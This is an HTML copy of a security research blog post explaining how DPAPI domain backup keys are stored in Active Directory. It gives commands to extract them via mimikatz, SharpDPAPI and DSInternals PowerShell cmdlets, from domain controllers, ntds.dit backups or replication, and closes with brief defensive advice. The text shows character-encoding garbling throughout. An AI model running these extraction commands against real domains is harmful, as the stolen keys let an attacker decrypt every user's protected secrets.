<!DOCTYPE html> <html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Begin Jekyll SEO tag v2.8.0 --> <title>Retrieving DPAPI Backup Keys from聽Active Directory | DSInternals</title> <meta name="generator" content="Jekyll v4.4.1" /> <meta property="og:title" content="Retrieving DPAPI Backup Keys from聽Active Directory" /> <meta name="author" content="Michael Grafnetter" /> <meta property="og:locale" content="en" /> <meta name="description" content="The Data Protection API (DPAPI) is聽used by聽several components of聽Windows to聽securely store passwords, encryption keys and聽other sensitive data. When聽DPAPI is聽used in聽an聽Active Directory domain environment, a聽copy of聽user鈥檚 master key is聽encrypted with聽a聽so-called DPAPI Domain Backup Key that聽is聽known to聽all domain controllers. Windows Server 2000 DCs use a聽symmetric key and聽newer systems use a聽public/private key pair. If聽the聽user password is聽reset and聽the聽original master key is聽rendered inaccessible to聽the聽user, the聽user鈥檚 access to聽the聽master key is聽automatically restored using the聽backup key." /> <meta property="og:description" content="The Data Protection API (DPAPI) is聽used by聽several components of聽Windows to聽securely store passwords, encryption keys and聽other sensitive data. When聽DPAPI is聽used in聽an聽Active Directory domain environment, a聽copy of聽user鈥檚 master key is聽encrypted with聽a聽so-called DPAPI Domain Backup Key that聽is聽known to聽all domain controllers. Windows Server 2000 DCs use a聽symmetric key and聽newer systems use a聽public/private key pair. If聽the聽user password is聽reset and聽the聽original master key is聽rendered inaccessible to聽the聽user, the聽user鈥檚 access to聽the聽master key is聽automatically restored using the聽backup key." /> <link rel="canonical" href="https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/" /> <meta property="og:url" content="https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/" /> <meta property="og:site_name" content="DSInternals" /> <meta property="og:image" content="https://www.dsinternals.com/assets/images/backupkeys_storage.png" /> <meta property="og:type" content="article" /> <meta property="article:published_time" content="2015-10-26T22:51:00+00:00" /> <meta name="twitter:card" content="summary" /> <meta property="twitter:image" content="https://www.dsinternals.com/assets/images/backupkeys_storage.png" /> <meta property="twitter:title" content="Retrieving DPAPI Backup Keys from聽Active Directory" /> <meta name="twitter:site" content="@MGrafnetter" /> <meta name="twitter:creator" content="@MGrafnetter" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Michael Grafnetter"},"dateModified":"2015-10-26T22:51:00+00:00","datePublished":"2015-10-26T22:51:00+00:00","description":"The Data Protection API (DPAPI) is聽used by聽several components of聽Windows to聽securely store passwords, encryption keys and聽other sensitive data. When聽DPAPI is聽used in聽an聽Active Directory domain environment, a聽copy of聽user鈥檚 master key is聽encrypted with聽a聽so-called DPAPI Domain Backup Key that聽is聽known to聽all domain controllers. Windows Server 2000 DCs use a聽symmetric key and聽newer systems use a聽public/private key pair. If聽the聽user password is聽reset and聽the聽original master key is聽rendered inaccessible to聽the聽user, the聽user鈥檚 access to聽the聽master key is聽automatically restored using the聽backup key.","headline":"Retrieving DPAPI Backup Keys from聽Active Directory","image":"https://www.dsinternals.com/assets/images/backupkeys_storage.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://www.dsinternals.com/favicon.png"},"name":"Michael Grafnetter"},"url":"https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/"}</script> <!-- End Jekyll SEO tag --> <script type="text/javascript"> !(function (cfg){function e(){cfg.onInit&&cfg.onInit(i)}var S,u,D,t,n,i,C=window,x=document,w=C.location,I="script",b="ingestionendpoint",E="disableExceptionTracking",A="ai.device.";"instrumentationKey"[S="toLowerCase"](),u="crossOrigin",D="POST",t="appInsightsSDK",n=cfg.name||"appInsights",(cfg.name||C[t])&&(C[t]=n),i=C[n]||function(l){var d=!1,g=!1,f={initialize:!0,queue:[],sv:"7",version:2,config:l};function m(e,t){var n={},i="Browser";function a(e){e=""+e;return 1===e.length?"0"+e:e}return n[A+"id"]=i[S](),n[A+"type"]=i,n["ai.operation.name"]=w&&w.pathname||"_unknown_",n["ai.internal.sdkVersion"]="javascript:snippet_"+(f.sv||f.version),{time:(i=new Date).getUTCFullYear()+"-"+a(1+i.getUTCMonth())+"-"+a(i.getUTCDate())+"T"+a(i.getUTCHours())+":"+a(i.getUTCMinutes())+":"+a(i.getUTCSeconds())+"."+(i.getUTCMilliseconds()/1e3).toFixed(3).slice(2,5)+"Z",iKey:e,name:"Microsoft.ApplicationInsights."+e.replace(/-/g,"")+"."+t,sampleRate:100,tags:n,data:{baseData:{ver:2}},ver:4,seq:"1",aiDataContract:undefined}}var h=-1,v=0,y=["js.monitor.azure.com","js.cdn.applicationinsights.io","js.cdn.monitor.azure.com","js0.cdn.applicationinsights.io","js0.cdn.monitor.azure.com","js2.cdn.applicationinsights.io","js2.cdn.monitor.azure.com","az416426.vo.msecnd.net"],k=l.url||cfg.src;if(k){if((n=navigator)&&(~(n=(n.userAgent||"").toLowerCase()).indexOf("msie")||~n.indexOf("trident/"))&&~k.indexOf("ai.3")&&(k=k.replace(/(\/)(ai\.3\.)([^\d]*)$/,function(e,t,n){return t+"ai.2"+n})),!1!==cfg.cr)for(var e=0;e<y.length;e++)if(0<k.indexOf(y[e])){h=e;break}var i=function(e){var a,t,n,i,o,r,s,c,p,u;f.queue=[],g||(0<=h&&v+1<y.length?(a=(h+v+1)%y.length,T(k.replace(/^(.*\/\/)([\w\.]*)(\/.*)$/,function(e,t,n,i){return t+y[a]+i})),v+=1):(d=g=!0,o=k,c=(p=function(){var e,t={},n=l.connectionString;if(n)for(var i=n.split(";"),a=0;a<i.length;a++){var o=i[a].split("=");2===o.length&&(t[o[0][S]()]=o[1])}return t[b]||(e=(n=t.endpointsuffix)?t.location:null,t[b]="https://"+(e?e+".":"")+"dc."+(n||"services.visualstudio.com")),t}()).instrumentationkey||l.instrumentationKey||"",p=(p=p[b])?p+"/v2/track":l.endpointUrl,(u=[]).push((t="SDK LOAD Failure: Failed to load Application Insights SDK script (See stack for details)",n=o,r=p,(s=(i=m(c,"Exception")).data).baseType="ExceptionData",s.baseData.exceptions=[{typeName:"SDKLoadFailed",message:t.replace(/\./g,"-"),hasFullStack:!1,stack:t+"\nSnippet failed to load ["+n+"] -- Telemetry is disabled\nHelp Link: https://go.microsoft.com/fwlink/?linkid=2128109\nHost: "+(w&&w.pathname||"_unknown_")+"\nEndpoint: "+r,parsedStack:[]}],i)),u.push((s=o,t=p,(r=(n=m(c,"Message")).data).baseType="MessageData",(i=r.baseData).message='AI (Internal): 99 message:"'+("SDK LOAD Failure: Failed to load Application Insights SDK script (See stack for details) ("+s+")").replace(/\"/g,"")+'"',i.properties={endpoint:t},n)),o=u,c=p,JSON&&((r=C.fetch)&&!cfg.useXhr?r(c,{method:D,body:JSON.stringify(o),mode:"cors"}):XMLHttpRequest&&((s=new XMLHttpRequest).open(D,c),s.setRequestHeader("Content-type","application/json"),s.send(JSON.stringify(o))))))},a=function(e,t){g||setTimeout(function(){!t&&f.core||i()},500),d=!1},T=function(e){var n=x.createElement(I),e=(n.src=e,cfg[u]);return!e&&""!==e||"undefined"==n[u]||(n[u]=e),n.onload=a,n.onerror=i,n.onreadystatechange=function(e,t){"loaded"!==n.readyState&&"complete"!==n.readyState||a(0,t)},cfg.ld&&cfg.ld<0?x.getElementsByTagName("head")[0].appendChild(n):setTimeout(function(){x.getElementsByTagName(I)[0].parentNode.appendChild(n)},cfg.ld||0),n};T(k)}try{f.cookie=x.cookie}catch(p){}function t(e){for(;e.length;)!function(t){f[t]=function(){var e=arguments;d||f.queue.push(function(){f[t].apply(f,e)})}}(e.pop())}var r,s,n="track",o="TrackPage",c="TrackEvent",n=(t([n+"Event",n+"PageView",n+"Exception",n+"Trace",n+"DependencyData",n+"Metric",n+"PageViewPerformance","start"+o,"stop"+o,"start"+c,"stop"+c,"addTelemetryInitializer","setAuthenticatedUserContext","clearAuthenticatedUserContext","flush"]),f.SeverityLevel={Verbose:0,Information:1,Warning:2,Error:3,Critical:4},(l.extensionConfig||{}).ApplicationInsightsAnalytics||{});return!0!==l[E]&&!0!==n[E]&&(t(["_"+(r="onerror")]),s=C[r],C[r]=function(e,t,n,i,a){var o=s&&s(e,t,n,i,a);return!0!==o&&f["_"+r]({message:e,url:t,lineNumber:n,columnNumber:i,error:a,evt:C.event}),o},l.autoExceptionInstrumented=!0),f}(cfg.cfg),(C[n]=i).queue&&0===i.queue.length?(i.queue.push(e),i.trackPageView({})):e();})({ src: "https://js.monitor.azure.com/scripts/b/ai.3.gbl.min.js", crossOrigin: "anonymous", cfg: { connectionString: "InstrumentationKey=09cc50fb-5ff9-43f5-9dee-313274ed35dc;IngestionEndpoint=https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnostics.monitor.azure.com/"} }); </script> <link rel="stylesheet" href="/assets/css/style.css?v=4b7ff9bc977ec6266b1f5ea7b6cf017f7c1b96ff"> <!-- Favicons --> <meta name="msapplication-TileImage" content="https://www.dsinternals.com/assets/images/logo_white.png" /> <link rel="shortcut icon" type="image/png" href="https://www.dsinternals.com/favicon.png" /> <link rel="icon" href="https://www.dsinternals.com/favicon.png" /> <link rel="apple-touch-icon-precomposed" href="https://www.dsinternals.com/assets/images/logo_white.png" /> <!-- Links --> <link rel="me" href="https://x.com/MGrafnetter" /> <link rel="alternate" type="application/atom+xml" href="https://www.dsinternals.com/en/feed.xml" title="DSInternals (EN)" /> <link rel="alternate" hreflang="en" href="https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/" /> <link rel="alternate" hreflang="sk" href="https://www.dsinternals.com/sk/ziskanie-zaloznych-klucov-dpapi-z-active-directory/" /> <!-- Icons --> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.7.2/css/all.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo= sha384-nRgPTkuX86pH8yjPJUAFuASXQSSl2/bBUiNV47vSYpKFxHJhbcrGnmlYpYJMeD7a sha512-Evv84Mr4kqVGRNSgIGL/F/aIDqQb7xQ2vcrdIwxfjThSH8CSR7PBEakCr51Ck+w+/U6swU2Im1vVX0SVk9ABhg==" crossorigin="anonymous"> </head> <body><header class="site-header"> <div class="wrapper"> <a class="site-title" rel="author" href="https://www.dsinternals.com/en"><img src="/assets/images/logo_white.png" width="50px"> DSInternals</a> <nav class="site-nav"> <input type="checkbox" id="nav-trigger" class="nav-trigger" /> <label for="nav-trigger"> <span class="menu-icon"> <svg viewBox="0 0 18 15" width="18px" height="15px"> <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/> </svg> </span> </label> <div class="trigger"> <!-- Menu Items --> <a href="/en/" class="page-link"><i class="fas fa-home"></i>&nbsp;BLOG</a> <a href="/en/videos/" class="page-link"><i class="fas fa-video"></i>&nbsp;VIDEOS</a> <a href="/en/projects/" class="page-link"><i class="fas fa-download"></i>&nbsp;PROJECTS</a> <a href="/en/about/" class="page-link"><i class="fas fa-user"></i>&nbsp;ABOUT</a> <!-- Language Link --> <a lang="sk" hreflang="sk" href="/sk/ziskanie-zaloznych-klucov-dpapi-z-active-directory/" class="page-link"> <i class="fas fa-globe"></i>&nbsp;SK </a> </div> </nav> </div> </header><main class="page-content" aria-label="Content"> <div class="wrapper"> <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting"> <header class="post-header"> <h1 class="post-title p-name" itemprop="name headline">Retrieving DPAPI Backup Keys from&nbsp;Active Directory</h1> <p class="post-meta"> <time class="dt-published" datetime="2015-10-26T22:51:00+00:00" itemprop="datePublished"> <i class="fas fa-calendar"></i>&nbsp;Oct 26, 2015</time> <span itemprop="author" itemscope itemtype="http://schema.org/Person"> <span class="p-author h-card" itemprop="name"> <i class="fas fa-user"></i>&nbsp;<a href="/en/about/" rel="author">Michael Grafnetter</a> </span> </span> </p> </header> <div class="post-content e-content" itemprop="articleBody"> <p>The Data Protection API (DPAPI) is聽used by聽several components of聽Windows to聽securely store passwords, encryption keys and聽other sensitive data. When聽DPAPI is聽used in聽an聽Active Directory domain environment, a聽copy of聽user鈥檚 master key is聽encrypted with聽a聽so-called DPAPI Domain Backup Key that聽is聽known to聽all domain controllers. Windows Server 2000 DCs use a聽symmetric key and聽newer systems use a聽public/private key pair. If聽the聽user password is聽reset and聽the聽original master key is聽rendered inaccessible to聽the聽user, the聽user鈥檚 access to聽the聽master key is聽automatically restored using the聽backup key.</p> <!--more--> <h2 id="themimikatz-method"> The聽Mimikatz Method <a href="#themimikatz-method" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>Benjamin Delpy has already found a聽way to聽extract these backup keys from聽the聽LSASS of聽domain controllers. It is implemented in the <code class="language-plaintext highlighter-rouge">lsadump::backupkeys</code> mimikatz command and聽it聽even聽works remotely:</p> <p><img src="../../assets/images/mimikatz_backupkeys.png" alt="Mimikatz DPAPI Backup Keys" /></p> <h2 id="dsinternals-implementation"> DSInternals Implementation <a href="#dsinternals-implementation" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>This attack is also implemented in my DSInternals PowerShell module:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-LsaBackupKey</span><span class="w"> </span><span class="nt">-ComputerName</span><span class="w"> </span><span class="nx">dc01.contoso.com</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Save-DPAPIBlob</span><span class="w"> </span><span class="nt">-DirectoryPath</span><span class="w"> </span><span class="s1">'.\Output'</span><span class="w"> </span></code></pre></div></div> <h2 id="sharpdpapi-implementation"> SharpDPAPI Implementation <a href="#sharpdpapi-implementation" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>The same sttack technique has also been implemented in <a href="https://github.com/GhostPack">GhostPack</a>:</p> <div class="language-batchfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">SharpDPAPI</span><span class="err">.exe</span> <span class="kd">backupkey</span> </code></pre></div></div> <h2 id="key-storage"> Key Storage <a href="#key-storage" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>I have taken Benjamin鈥檚 research one step further and聽I聽can聽now聽extract these keys directly from聽the聽Active Directory database, where聽they are聽physically stored:</p> <p><img src="../../assets/images/backupkeys_storage.png" alt="Backup Key Storage" /></p> <p>The keys are聽stored in聽the聽<strong>currentValue</strong> attribute of聽objects whose names begin with聽<strong>BCKUPKEY</strong> and聽are聽of聽class <strong>secret</strong>. The聽<strong>BCKUPKEY_PREFERRED Secret</strong> and聽<strong>BCKUPKEY_P Secret</strong> objects actually only contain GUIDs of聽objects that聽hold the聽current modern and聽legacy keys, respectively.</p> <p>Furthermore, the聽currentValue attribute is聽encrypted using BootKey (aka SysKey) and聽is聽never sent through LDAP. After decrypting it, we will get a self-signed certificate with no subject:</p> <p><img src="/assets/images/dpapi_backup_key.png" alt="DPAPI Backup Key" /></p> <h2 id="thedatabase-dump-method"> The聽Database Dump Method <a href="#thedatabase-dump-method" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>The <strong>Get-BootKey</strong>, <strong>Get-ADDBBackupKey</strong> and聽<strong>Save-DPAPIBlob</strong> cmdlets from聽my <a href="/en/projects/">DSInternals PowerShell Module</a> can聽be聽used to聽retrieve the聽DPAPI Domain Backup Keys from聽ntds.dit files:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># We need to聽get the聽BootKey from聽the聽SYSTEM registry hive first:</span><span class="w"> </span><span class="n">Get-BootKey</span><span class="w"> </span><span class="nt">-SystemHiveFilePath</span><span class="w"> </span><span class="s1">'C:\IFM\registry\SYSTEM'</span><span class="w"> </span><span class="cm">&lt;# Output: 41e34661faa0d182182f6ddf0f0ca0d1 #&gt;</span><span class="w"> </span><span class="c"># Now聽we can decrypt the聽DPAPI backup keys from聽the聽database:</span><span class="w"> </span><span class="n">Get-ADDBBackupKey</span><span class="w"> </span><span class="nt">-DBPath</span><span class="w"> </span><span class="s1">'C:\IFM\Active Directory\ntds.dit'</span><span class="w"> </span><span class="se">` </span><span class="w"> </span><span class="nt">-BootKey</span><span class="w"> </span><span class="nx">41e34661faa0d182182f6ddf0f0ca0d1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Format-List</span><span class="w"> </span><span class="cm">&lt;# Output: Type聽: LegacyKey DistinguishedName聽: CN=BCKUPKEY_7882b20e-96ef-4ce5-a2b9-3efdccbbce28 Secret,CN=System,DC=Adatum,DC=com RawKeyData聽: {77, 138, 250, 6...} KeyId聽: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28 Type聽: PreferredLegacyKeyPointer DistinguishedName聽: CN=BCKUPKEY_P Secret,CN=System,DC=Adatum,DC=com RawKeyData聽: {14, 178, 130, 120...} KeyId聽: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28 Type聽: RSAKey DistinguishedName聽: CN=BCKUPKEY_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d Secret,CN=System,DC=Adatum,DC=com RawKeyData聽: {48, 130, 9, 186...} KeyId聽: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d Type聽: PreferredRSAKeyPointer DistinguishedName聽: CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=Adatum,DC=com RawKeyData聽: {62, 106, 197, 177...} KeyId聽: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d #&gt;</span><span class="w"> </span><span class="c"># In聽most cases, we just want to聽export these keys to聽the file system:</span><span class="w"> </span><span class="n">Get-ADDBBackupKey</span><span class="w"> </span><span class="nt">-DBPath</span><span class="w"> </span><span class="s1">'C:\IFM\Active Directory\ntds.dit'</span><span class="w"> </span><span class="se">` </span><span class="w"> </span><span class="nt">-BootKey</span><span class="w"> </span><span class="nx">41e34661faa0d182182f6ddf0f0ca0d1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Save-DPAPIBlob</span><span class="w"> </span><span class="nt">-DirectoryPath</span><span class="w"> </span><span class="o">.</span><span class="nx">\Keys</span><span class="w"> </span><span class="c"># New files should have been created in聽the聽Keys directory:</span><span class="w"> </span><span class="p">(</span><span class="n">dir</span><span class="w"> </span><span class="o">.</span><span class="nx">\Keys</span><span class="p">)</span><span class="o">.</span><span class="nf">Name</span><span class="w"> </span><span class="cm">&lt;# Output: ntds_capi_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d.pfx ntds_legacy_7882b20e-96ef-4ce5-a2b9-3efdccbbce28.key #&gt;</span><span class="w"> </span></code></pre></div></div> <p>Note that聽mimikatz would name these files similarly.</p> <h2 id="thedrsr-method"> The聽DRSR Method <a href="#thedrsr-method" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>The same result can聽be聽achieved by聽communicating with聽the聽Directory Replication Service using the聽<strong>Get-ADReplBackupKey</strong> cmdlet:</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Get-ADReplBackupKey</span><span class="w"> </span><span class="nt">-Domain</span><span class="w"> </span><span class="s1">'Adatum.com'</span><span class="w"> </span><span class="nt">-Server</span><span class="w"> </span><span class="nx">LON-DC1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Save-DPAPIBlob</span><span class="w"> </span><span class="nt">-DirectoryPath</span><span class="w"> </span><span class="o">.</span><span class="nx">\Keys</span><span class="w"> </span></code></pre></div></div> <h2 id="defense"> Defense <a href="#defense" class="heading-link" title="Permalink"><i class="fa fa-link"></i></a> </h2> <p>I am already starting to聽repeat myself:</p> <ul> <li>Restrict access to聽domain controller backups.</li> <li>Be聽cautious when聽delegating the聽<em>Replicating Directory Changes All</em> right.</li> </ul> </div> </article> </div> </main><footer class="site-footer h-card"> <div class="wrapper"> <div class="social-links"><ul class="social-media-list"><li> <a rel="me" href="https://github.com/MichaelGrafnetter" target="_blank" title="GitHub: MichaelGrafnetter"> <span class="grey fa-brands fa-github fa-3x"></span> </a> </li><li> <a rel="me" href="https://x.com/MGrafnetter" target="_blank" title="X: @MGrafnetter"> <span class="grey fa-brands fa-x-twitter fa-3x"></span> </a> </li><li> <a rel="me" href="https://www.linkedin.com/in/grafnetter/" target="_blank" title="LinkedIn: grafnetter"> <span class="grey fa-brands fa-linkedin fa-3x"></span> </a> </li><li><a href="https://www.dsinternals.com/en/feed.xml" title="RSS (EN)"><span class="grey fa-solid fa-square-rss fa-3x"></span></a></li></ul> </div> </div> </footer> <script src="/assets/scripts/copy-code.js"></script> </body> </html>